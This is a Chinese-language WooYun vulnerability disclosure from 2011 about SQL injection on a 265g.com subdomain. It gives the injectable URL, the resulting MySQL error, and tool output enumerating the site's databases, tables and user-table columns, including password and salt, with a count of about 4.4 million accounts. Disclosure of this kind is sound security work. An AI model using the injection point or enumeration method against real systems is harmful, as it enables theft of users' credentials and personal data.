漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02981
漏洞标题:游戏窝存在严重sql注入
相关厂商:游戏窝265g.com
漏洞作者: Bloodwolf
提交时间:2011-10-12 06:13
修复时间:2011-10-12 10:01
公开时间:2011-10-12 10:01
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-10-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
265g.com。 游戏窝。440W数据 因为某分站存在严重sql漏洞导致用户信息大量泄漏。请及时修复
详细说明:
http://my.265g.com/flash.php?fgid=21'
MySQL Error
Message: MySQL Query Error
SQL: SELECT * FROM uchome_app_fgamelist Where fgid=21'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Errno.: 1064
Click here to seek help.
不多解释,估计数据已经被他人拿到。
漏洞证明:
Target: http://my.265g.com/flash.php?fgid=21
Host IP: 219.129.216.204
Web Server: nginx
Powered-by: PHP/5.3.6
DB Server: MySQL error based
Resp. Time(avg): 204 ms
Current User: user@127.0.0.1
Sql Version: 5.5.11
Current DB: uchome
System User: user@127.0.0.1
Host Name: qyeee
Installation dir: /usr/local/mysql
DB User: 'user'@'%'
Data Bases: information_schema
discuz
g265
test
ucenter
uchome
Count(table_name) of information_schema.tables where table_schema=0x7563656E746572 is 33
Table found: code
Table found: uc_admins
Table found: uc_applications
Table found: uc_badwords
Table found: uc_domains
Table found: uc_failedlogins
Table found: uc_feeds
Table found: uc_friends
Table found: uc_mailqueue
Table found: uc_memberfields
Table found: uc_members
Table found: uc_mergemembers
Table found: uc_newpm
Table found: uc_notelist
Table found: uc_pm_indexes
Table found: uc_pm_lists
Table found: uc_pm_members
Table found: uc_pm_messages_0
Table found: uc_pm_messages_1
Table found: uc_pm_messages_2
Table found: uc_pm_messages_3
Table found: uc_pm_messages_4
Table found: uc_pm_messages_5
Table found: uc_pm_messages_6
Table found: uc_pm_messages_7
Table found: uc_pm_messages_8
Table found: uc_pm_messages_9
Table found: uc_protectedmembers
Table found: uc_settings
Table found: uc_sqlcache
Table found: uc_tags
Table found: uc_vars
Table found: uc_wb
Count(column_name) of information_schema.columns where table_schema=0x7563656E746572 and table_name=0x75635F6D656D62657273 is 15
Column found: uid
Column found: username
Column found: password
Column found: email
Column found: myid
Column found: myidkey
Column found: regip
Column found: regdate
Column found: lastloginip
Column found: lastlogintime
Column found: salt
Column found: secques
Column found: qdjf
Column found: qdjy
Column found: openid
Database: ucenter
Table: uc_members
[15 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| openid | varchar(50) |
| password | char(32) |
| qdjf | int(11) |
| qdjy | int(11) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+---------------+-----------------------+
Count(*) of ucenter.uc_members is 4433975
下面省略。
修复方案:
不解释
版权声明:转载请注明来源 Bloodwolf@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)